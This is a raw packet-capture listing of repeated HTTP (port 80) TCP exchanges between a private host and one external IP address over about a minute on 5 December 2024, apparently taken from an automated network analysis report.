                                                Dec 5, 2024 16:02:57.143381119 CET4983280192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:57.202172995 CET8049833121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:57.252888918 CET4983380192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:57.320502043 CET8049832121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:57.362128973 CET4983280192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:57.436803102 CET8049833121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:57.487123966 CET4983380192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:57.562812090 CET4983380192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:57.562947035 CET4983280192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:57.563149929 CET4983980192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:57.682950974 CET8049833121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:57.682975054 CET8049839121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:57.683049917 CET4983380192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:57.683098078 CET4983980192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:57.683260918 CET4983980192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:57.683502913 CET8049832121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:57.683558941 CET4983280192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:57.803076982 CET8049839121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:58.034343004 CET4983980192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:58.154506922 CET8049839121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:58.154522896 CET8049839121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:58.154535055 CET8049839121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:59.011532068 CET8049839121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:59.065289974 CET4983980192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:59.191570044 CET8049824121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:59.191660881 CET4982480192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:59.244884968 CET8049839121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:59.299655914 CET4983980192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:59.359371901 CET4984480192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:59.479278088 CET8049844121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:59.479398966 CET4984480192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:59.479588032 CET4984480192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:59.599420071 CET8049844121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:59.830981970 CET4984480192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:59.951540947 CET8049844121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:59.951680899 CET8049844121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:59.951832056 CET8049844121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:00.800514936 CET8049844121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:00.846546888 CET4984480192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:01.036755085 CET8049844121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:01.081011057 CET4984480192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:01.152115107 CET4983980192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:01.152204990 CET4982480192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:01.156579971 CET4984480192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:01.156835079 CET4985080192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:01.276859045 CET8049850121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:01.276953936 CET4985080192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:01.277158976 CET4985080192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:01.277184010 CET8049844121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:01.277251959 CET4984480192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:01.397099018 CET8049850121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:01.627890110 CET4985080192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:01.747800112 CET8049850121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:01.747817993 CET8049850121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:01.747859001 CET8049850121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:02.332146883 CET4985080192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:02.332329988 CET4985380192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:02.452352047 CET8049853121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:02.452423096 CET4985380192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:02.452593088 CET4985380192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:02.454895973 CET4985480192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:02.492300034 CET8049850121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:02.540076971 CET8049850121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:02.543201923 CET4985080192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:02.572463989 CET8049853121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:02.574934006 CET8049854121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:02.575170040 CET4985480192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:02.575346947 CET4985480192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:02.699692965 CET8049854121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:02.799791098 CET4985380192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:02.920021057 CET8049853121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:02.920053959 CET8049853121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:02.924726963 CET4985480192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:03.044595957 CET8049854121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:03.044636965 CET8049854121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:03.044725895 CET8049854121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:03.770684958 CET8049853121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:03.815324068 CET4985380192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:03.897723913 CET8049854121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:03.940251112 CET4985480192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:04.004196882 CET8049853121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:04.049664021 CET4985380192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:04.132088900 CET8049854121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:04.174673080 CET4985480192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:04.249700069 CET4985380192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:04.249782085 CET4985480192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:04.250077963 CET4986080192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:04.369863033 CET8049860121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:04.370004892 CET4986080192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:04.370407104 CET8049853121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:04.370471001 CET4985380192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:04.370481968 CET8049854121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:04.370529890 CET4985480192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:04.392101049 CET4986080192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:04.511735916 CET8049860121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:04.739388943 CET4986080192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:04.859167099 CET8049860121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:04.859191895 CET8049860121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:04.859220982 CET8049860121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:05.688854933 CET8049860121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:05.737189054 CET4986080192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:05.924319983 CET8049860121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:05.971527100 CET4986080192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:06.049176931 CET4986080192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:06.049511909 CET4986280192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:34.760484934 CET8049941121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:34.760730982 CET4994180192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:34.760945082 CET4994680192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:34.760946035 CET4994680192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:34.880703926 CET8049946121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:35.112457037 CET4994680192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:35.232454062 CET8049946121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:35.232475996 CET8049946121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:35.232564926 CET8049946121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:35.789391994 CET4995280192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:35.790864944 CET4994680192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:35.909111023 CET8049952121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:35.911006927 CET8049946121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:35.911113024 CET4994680192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:35.911120892 CET4995280192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:35.915584087 CET4995280192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:36.036169052 CET8049952121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:36.132076025 CET4995380192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:36.251971006 CET8049953121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:36.252156019 CET4995380192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:36.252336979 CET4995380192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:36.268610954 CET4995280192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:36.371989965 CET8049953121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:36.388355970 CET8049952121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:36.388473034 CET8049952121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:36.596806049 CET4995380192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:36.717242002 CET8049953121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:36.717282057 CET8049953121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:36.717291117 CET8049953121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:37.236725092 CET8049952121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:37.284208059 CET4995280192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:37.468597889 CET8049952121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:37.518562078 CET4995280192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:37.577081919 CET8049953121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:37.615556002 CET8049939121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:37.615612030 CET4993980192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:37.627887011 CET4995380192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:37.812661886 CET8049953121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:37.862284899 CET4995380192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:37.936292887 CET4995280192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:37.936386108 CET4995380192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:37.936580896 CET4995980192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:38.056484938 CET8049952121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:38.056557894 CET4995280192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:38.056950092 CET8049959121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:38.057055950 CET4995980192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:38.057252884 CET4995980192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:38.057379007 CET8049953121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:38.057431936 CET4995380192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:38.176953077 CET8049959121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:38.409250021 CET4995980192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:38.529299021 CET8049959121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:38.529315948 CET8049959121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:38.529325008 CET8049959121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:39.383625984 CET8049959121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:39.424791098 CET4995980192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:39.618520975 CET8049959121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:39.674788952 CET4995980192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:39.730004072 CET4993980192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:39.735485077 CET4996580192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:39.982585907 CET8049965121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:39.982672930 CET4996580192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:39.982846022 CET4996580192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:40.103162050 CET8049965121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:40.331140041 CET4996580192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:40.451271057 CET8049965121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:40.451283932 CET8049965121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:40.451371908 CET8049965121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:41.304776907 CET8049965121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:41.346649885 CET4996580192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:41.540502071 CET8049965121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:41.581036091 CET4996580192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:41.655451059 CET4996580192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:41.655657053 CET4997080192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:41.775530100 CET8049970121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:41.775614977 CET4997080192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:41.775629997 CET8049965121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:41.775679111 CET4996580192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:41.775845051 CET4997080192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:41.896086931 CET8049970121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:42.128026009 CET4997080192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:42.247910976 CET8049970121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:42.247941017 CET8049970121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:42.247950077 CET8049970121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:42.474162102 CET4997180192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:42.474526882 CET4997080192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:42.594113111 CET8049971121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:42.594207048 CET4997180192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:42.594403982 CET4997180192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:42.618099928 CET4997280192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:42.636462927 CET8049970121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:42.714188099 CET8049971121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:42.737879992 CET8049972121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:42.737974882 CET4997280192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:42.741384983 CET4997280192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:42.791922092 CET8049970121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:42.792150974 CET4997080192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:42.861222982 CET8049972121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:42.940788984 CET4997180192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:43.060703993 CET8049971121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:43.060734987 CET8049971121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:43.096882105 CET4997280192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:43.216826916 CET8049972121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:43.216852903 CET8049972121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:43.216895103 CET8049972121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:43.916599989 CET8049971121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:43.971693993 CET4997180192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:44.061640024 CET8049972121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:44.112338066 CET4997280192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:44.152575016 CET8049971121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:44.206053019 CET4997180192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:44.301774025 CET8049972121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:44.346712112 CET4997280192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:44.408688068 CET8049959121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:44.408788919 CET4995980192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:44.420363903 CET4997180192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:44.420447111 CET4997280192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:44.420732975 CET4997880192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:44.540646076 CET8049978121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:44.541220903 CET4997880192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:44.541449070 CET8049971121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:44.541467905 CET4997880192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:44.541511059 CET4997180192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:44.541557074 CET8049972121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:44.541639090 CET4997280192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:44.661326885 CET8049978121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:44.893690109 CET4997880192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:45.013681889 CET8049978121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:45.013766050 CET8049978121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:45.013819933 CET8049978121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:45.868026018 CET8049978121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:45.909198999 CET4997880192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:46.100414038 CET8049978121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:46.143565893 CET4997880192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:46.217713118 CET4977980192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:46.217766047 CET4975980192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:46.217811108 CET4991980192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:46.217853069 CET4995980192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:46.218477011 CET4998480192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:46.338344097 CET8049984121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:46.339021921 CET4998480192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:46.339222908 CET4998480192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:46.459088087 CET8049984121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:46.690880060 CET4998480192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:46.811714888 CET8049984121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:46.811734915 CET8049984121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:46.811745882 CET8049984121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:47.664349079 CET8049984121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:47.721748114 CET4998480192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:47.896100998 CET8049984121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:47.940437078 CET4998480192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:48.015037060 CET4998480192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:48.015355110 CET4998680192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:48.135059118 CET8049986121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:48.135171890 CET4998680192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:48.135325909 CET8049984121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:48.135384083 CET4998680192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:48.135400057 CET4998480192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:48.255501032 CET8049986121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:48.487426043 CET4998680192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:48.607309103 CET8049986121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:48.607335091 CET8049986121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:48.607347012 CET8049986121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:49.160351992 CET4999180192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:49.160505056 CET4998680192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:49.280328989 CET8049991121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:49.280406952 CET4999180192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:49.280567884 CET4999180192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:49.281559944 CET8049986121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:49.281635046 CET4998680192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:49.281877995 CET4999280192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:49.400324106 CET8049991121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:49.401684999 CET8049992121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:49.401798964 CET4999280192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:49.401921034 CET4999280192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:49.521748066 CET8049992121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:49.628051996 CET4999180192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:49.747869968 CET8049991121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:49.747919083 CET8049991121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:49.753077030 CET4999280192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:49.872946024 CET8049992121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:49.873048067 CET8049992121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:49.873083115 CET8049992121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:50.686480999 CET8049991121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:50.737390995 CET4999180192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:50.869203091 CET8049992121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:50.909203053 CET4999280192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:50.920602083 CET8049991121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:50.971699953 CET4999180192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:51.019151926 CET8049978121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:51.019217968 CET4997880192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:51.108361006 CET8049992121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:51.159276962 CET4999280192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:51.236972094 CET4999180192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:51.237060070 CET4999280192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:51.237540960 CET4999880192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:51.357316017 CET8049991121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:51.357331991 CET8049998121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:51.357379913 CET4999180192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:51.357434034 CET4999880192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:51.357625961 CET4999880192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:51.357960939 CET8049992121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:51.358036041 CET4999280192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:51.477436066 CET8049998121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:51.706182957 CET4999880192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:51.826185942 CET8049998121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:51.826200008 CET8049998121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:51.826271057 CET8049998121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:52.676578045 CET8049998121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:52.721707106 CET4999880192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:52.985109091 CET8049998121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:53.034465075 CET4999880192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:53.113599062 CET4999880192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:53.113804102 CET5000480192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:53.233541012 CET8050004121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:53.233623981 CET5000480192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:53.233771086 CET8049998121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:53.233819962 CET4999880192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:53.233935118 CET5000480192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:53.354592085 CET8050004121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:53.581221104 CET5000480192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:53.701767921 CET8050004121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:53.701785088 CET8050004121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:53.701863050 CET8050004121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:54.595108032 CET8050004121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:54.643574953 CET5000480192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:54.832226992 CET8050004121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:54.877962112 CET5000480192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:54.954582930 CET5000480192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:54.954956055 CET5001080192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:55.074800014 CET8050010121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:55.074872971 CET5001080192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:55.074924946 CET8050004121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:55.074975014 CET5000480192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:55.075115919 CET5001080192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:55.194963932 CET8050010121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:55.424959898 CET5001080192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:55.545358896 CET8050010121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:55.545545101 CET8050010121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:55.545628071 CET8050010121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:03:55.925674915 CET5001180192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:55.925685883 CET5001080192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:56.045703888 CET8050011121.127.37.30192.168.2.7
